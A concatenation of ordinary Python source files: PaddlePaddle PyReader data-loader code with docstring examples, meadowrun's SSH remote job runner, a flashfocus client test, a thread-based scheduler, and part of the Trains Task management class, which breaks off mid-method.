return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
run_job_core.py
|
"""
This code belongs in run_job.py, but this is split out to avoid circular dependencies
"""
from __future__ import annotations
import abc
import asyncio
import dataclasses
import io
import pickle
import threading
from typing import (
Any,
Callable,
Coroutine,
Dict,
Generic,
List,
Literal,
Optional,
Tuple,
TypeVar,
Union,
cast,
)
import fabric
import paramiko.ssh_exception
from meadowrun.credentials import UsernamePassword
from meadowrun.meadowrun_pb2 import Job, ProcessState
_T = TypeVar("_T")
CloudProvider = "EC2", "AzureVM"
CloudProviderType = Literal["EC2", "AzureVM"]
async def _retry(
function: Callable[[], _T],
exception_types: Union[Exception, Tuple[Exception, ...]],
max_num_attempts: int = 5,
delay_seconds: float = 1,
) -> _T:
i = 0
while True:
try:
return function()
except exception_types as e: # type: ignore
i += 1
if i >= max_num_attempts:
raise
else:
print(f"Retrying on error: {e}")
await asyncio.sleep(delay_seconds)
class Host(abc.ABC):
@abc.abstractmethod
async def run_job(self, job: Job) -> JobCompletion[Any]:
pass
@dataclasses.dataclass(frozen=True)
class SshHost(Host):
"""
Tells run_function and related functions to connects to the remote machine over SSH
via the fabric library https://www.fabfile.org/ fabric_kwargs are passed directly to
fabric.Connection().
"""
address: str
# these options are forwarded directly to Fabric
fabric_kwargs: Optional[Dict[str, Any]] = None
# If this field is populated, it will be a tuple of (cloud provider, region name).
# Cloud provider will be e.g. "EC2" indicating that we're running on e.g. an EC2
# instance allocated via instance_allocation.py, so we need to deallocate the job
# via the right InstanceRegistrar when we're done. region name indicates where
# the InstanceRegistrar that we used to allocate this job is.
cloud_provider: Optional[Tuple[CloudProviderType, str]] = None
async def run_job(self, job: Job) -> JobCompletion[Any]:
with fabric.Connection(
self.address, **(self.fabric_kwargs or {})
) as connection:
job_io_prefix = ""
try:
# assumes that meadowrun is installed in /var/meadowrun/env as per
# build_meadowrun_amis.md. Also uses the default working_folder, which
# should (but doesn't strictly need to) correspond to
# agent._set_up_working_folder
# try the first command 3 times, as this is when we actually try to
# connect to the remote machine.
home_result = await _retry(
lambda: connection.run("echo $HOME", hide=True, in_stream=False),
(
cast(Exception, paramiko.ssh_exception.NoValidConnectionsError),
cast(Exception, TimeoutError),
),
)
if not home_result.ok:
raise ValueError(
"Error getting home directory on remote machine "
+ home_result.stdout
)
# in_stream is needed otherwise invoke listens to stdin, which pytest
# doesn't like
remote_working_folder = f"{home_result.stdout.strip()}/meadowrun"
mkdir_result = connection.run(
f"mkdir -p {remote_working_folder}/io", in_stream=False
)
if not mkdir_result.ok:
raise ValueError(
"Error creating meadowrun directory " + mkdir_result.stdout
)
job_io_prefix = f"{remote_working_folder}/io/{job.job_id}"
# serialize job_to_run and send it to the remote machine
with io.BytesIO(job.SerializeToString()) as job_to_run_serialized:
connection.put(
job_to_run_serialized, remote=f"{job_io_prefix}.job_to_run"
)
# fabric doesn't have any async APIs, which means that in order to run
# more than one fabric command at the same time, we need to have a
# thread per fabric command. We use an asyncio.Future here to make the
# API async, so from the user perspective, it feels like this function
# is async
# fabric is supposedly not threadsafe, but it seems to work as long as
# more than one connection is not being opened at the same time:
# https://github.com/fabric/fabric/pull/2010/files
result_future: asyncio.Future = asyncio.Future()
event_loop = asyncio.get_running_loop()
command = (
f"/var/meadowrun/env/bin/meadowrun-local --job-id {job.job_id} "
f"--working-folder {remote_working_folder}"
)
if self.cloud_provider is not None:
command += f" --cloud {self.cloud_provider[0]}"
command += f" --cloud-region-name {self.cloud_provider[1]}"
print(f"Running {command}")
def run_and_wait() -> None:
try:
# use meadowrun to run the job
returned_result = connection.run(command, in_stream=False)
event_loop.call_soon_threadsafe(
lambda r=returned_result: result_future.set_result(r)
)
except Exception as e2:
event_loop.call_soon_threadsafe(
lambda e2=e2: result_future.set_exception(e2)
)
threading.Thread(target=run_and_wait).start()
result = await result_future
# TODO consider using result.tail, result.stdout
# see if we got a normal return code
if result.return_code != 0:
raise ValueError(f"Process exited {result.return_code}")
with io.BytesIO() as result_buffer:
connection.get(f"{job_io_prefix}.process_state", result_buffer)
result_buffer.seek(0)
process_state = ProcessState()
process_state.ParseFromString(result_buffer.read())
if process_state.state == ProcessState.ProcessStateEnum.SUCCEEDED:
job_spec_type = job.WhichOneof("job_spec")
# we must have a result from functions, in other cases we can
# optionally have a result
if job_spec_type == "py_function" or process_state.pickled_result:
result = pickle.loads(process_state.pickled_result)
else:
result = None
return JobCompletion(
result,
process_state.state,
process_state.log_file_name,
process_state.return_code,
self.address,
)
else:
raise MeadowrunException(process_state)
finally:
if job_io_prefix:
remote_paths = " ".join(
[
f"{job_io_prefix}.job_to_run",
f"{job_io_prefix}.state",
f"{job_io_prefix}.result",
f"{job_io_prefix}.process_state",
f"{job_io_prefix}.initial_process_state",
]
)
try:
# -f so that we don't throw an error on files that don't
# exist
connection.run(f"rm -f {remote_paths}", in_stream=False)
except Exception as e:
print(
f"Error cleaning up files on remote machine: "
f"{remote_paths} {e}"
)
# TODO also clean up log files?
@dataclasses.dataclass(frozen=True)
class AllocCloudInstancesInternal:
"""Identical to AllocCloudInstances but all values must be set"""
logical_cpu_required_per_task: int
memory_gb_required_per_task: float
interruption_probability_threshold: float
num_concurrent_tasks: int
region_name: str
@dataclasses.dataclass
class JobCompletion(Generic[_T]):
"""Information about how a job completed"""
# TODO both JobCompletion and MeadowrunException should be revisited
result: _T
process_state: ProcessState._ProcessStateEnum.ValueType
log_file_name: str
return_code: int
public_address: str
class MeadowrunException(Exception):
def __init__(self, process_state: ProcessState) -> None:
super().__init__("Failure while running a meadowrun job: " + str(process_state))
self.process_state = process_state
@dataclasses.dataclass(frozen=True)
class RunMapHelper:
"""See run_map. This allows run_map to use EC2 or Azure VMs"""
region_name: str
allocated_hosts: Dict[str, List[str]]
# public_address, worker_id -> None
worker_function: Callable[[str, int], None]
fabric_kwargs: Dict[str, Any]
results_future: Coroutine[Any, Any, List[Any]]
@dataclasses.dataclass(frozen=True)
class ContainerRegistryHelper:
"""
Allows compile_environment_spec_to_container to use either AWS ECR, Azure CR, or
neither
"""
should_push: bool
username_password: Optional[UsernamePassword]
image_name: str
does_image_exist: bool
|
test_client.py
|
"""Test suite for flashfocus.client."""
from __future__ import unicode_literals
from threading import Thread
from time import sleep
from flashfocus.client import client_request_flash
def test_client_request_flash(stub_server):
p = Thread(target=stub_server.await_data)
p.start()
client_request_flash()
sleep(0.05)
p.join()
assert stub_server.data == [b"1"]
|
cron.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
class SchedulerService:
def __init__(self,app,**kwargs):
import sched
import time
self._jobs = []
self.sched = sched.scheduler(time.time, time.sleep)
def schedule(self,when,what,*args,**kwargs):
self._jobs.append((when,what,args))
self.repeat(when,what,args)
def repeat(self,interval, func, args):
interval = int(interval)
if interval:
from threading import Event, Thread
stopped = Event()
def loop():
while not stopped.wait(interval):
try:
func(*args)
except Exception as err:
print('SchedulerService ERROR', err)
t = Thread(target=loop)
t.daemon = True
t.start()
return stopped.set
|
task.py
|
""" Backend task management support """
import itertools
import logging
import os
import sys
import re
from enum import Enum
from tempfile import gettempdir
from multiprocessing import RLock
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from pathlib2 import Path
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend, \
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from ...config import config, PROC_MASTER_ID_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
_force_requirements = {}
_store_diff = config.get('development.store_uncommitted_code_diff', False)
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib is never in debug/info,
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(self.session, self.task_id)
# Add backend handler to both loggers:
# 1. to root logger root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate our logger will be caught be the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version:
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ],
log=self.log, create_requirements=False, check_uncommitted=self._store_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entrypoint
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
self.data.script = result.script
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
self._edit(script=result.script)
self.reload()
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
self.reload()
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s by %(user)s@%(host)s')
if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(self.TaskTypes.training, task_type.value))
task_type = self.TaskTypes.training
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_model_id(self):
# type: () -> str
return self.data.execution.model
@property
def output_model_id(self):
# type: () -> str
return self.data.output.model
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated.
Trains reloads the Task status information only, when this value is accessed.
return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
# type: () -> Optional[Model]
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
# type: () -> Optional[Model]
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
# type: () -> Model
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False, model_id=None):
# type: (bool, bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or (None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False)),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
